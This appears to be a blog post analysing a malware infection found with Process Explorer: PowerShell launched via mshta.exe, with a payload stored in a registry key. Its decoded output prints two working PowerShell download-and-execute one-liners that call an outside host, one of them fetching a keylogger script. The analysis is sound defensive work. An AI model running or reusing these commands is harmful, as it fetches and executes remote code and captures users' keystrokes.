Suspicious Activity via Powershell

I have been using Process Explorer quite a lot. Its kind of replacement of Task manager for me. Some day I may write about it or share the training module regarding the same however this post belongs to tell you all, how process explorer helped me in finding the suspicious activity via Powershell.

One of a machine was showing high CPU utilization for few days however at the time when I logged-in it was not showing high CPU utilization by PowerShell however Powershell instances were still running.

When I logged in , there were 3 instances of PowerShell running under mshta.exe in tree view structure which is Microsoft HTML Application Host . At times used by malwares for executing the program/applications however mshta.exe is a valid Microsoft executable.

Opening the properties of PowerShell and checked the command which was like this :

ProcessExplorer - PowerShell Activity

ProcessExplorer – PowerShell Activity

The command explains that powershell is trying to read the registry location HKLM\Software\Microsoft\Windows\CurrentVersion  for the key SecCert .  Value under SecCert

Registry Entry in the SecCert registry key.

Registry Entry in the SecCert registry key.

Now when we checked the properties of 2nd PowerShell process which is child of 1st PowerShell , it is evident that the PowerShell is executed with the key from registry .

2nd instance of PowerShell activity

2nd instance of PowerShell activity

So far it was evident that a script is running PowerShell to execute PowerShell command whose parameter is stored in registry. Now I checked the command for last PowerShell executable which was like

Last PowerShell instance activity

Last PowerShell instance activity

Now we have 2 [two] PowerShell command with BASE64 encoded information which is http transmission .  On using online base64 decoder we found  below 2[two] output

Output of 2nd PowerShell command

Output of 2nd PowerShell command

Output of 2nd PowerShell command

When we remove the white boxes we get the text as

“while(1){try{IEX(New-Object Net.WebClient).DownloadString(‘http://protdirection.com/’+([char](85-(-37))))}catch{Start-Sleep -s 10}}”

Now we are trying for the

3rd PowerShell http transmission

3rd PowerShell http transmission

The output file after removing the white boxes  we get the command

“[System.Net.ServicePointManager]:: ServerCertificateValidationCallback = { $true }; IEX(New-Object Net.WebClient).DownloadString(‘https://protdirection.com/script?id=random&name=keylog’)”

 

Conclusion :

 

Above troubleshooting steps leads to a conclusion that somehow it’s infected by malware which is trying to download script from the location https://protdirection.com/script?id=random&name=keylog and then executing the script to capture the key stroke and sending to the network location.

 

Since we are not sure about the complete functionality of the script downloaded from the site, we can’t execute it from our end. If in-case someone wants to understand what exactly is happening you will need to capture PROCMON and Wireshark log while script execution.

 

Reference :

  1. To understand what Base64 is , here is the link https://en.wikipedia.org/wiki/Base64 .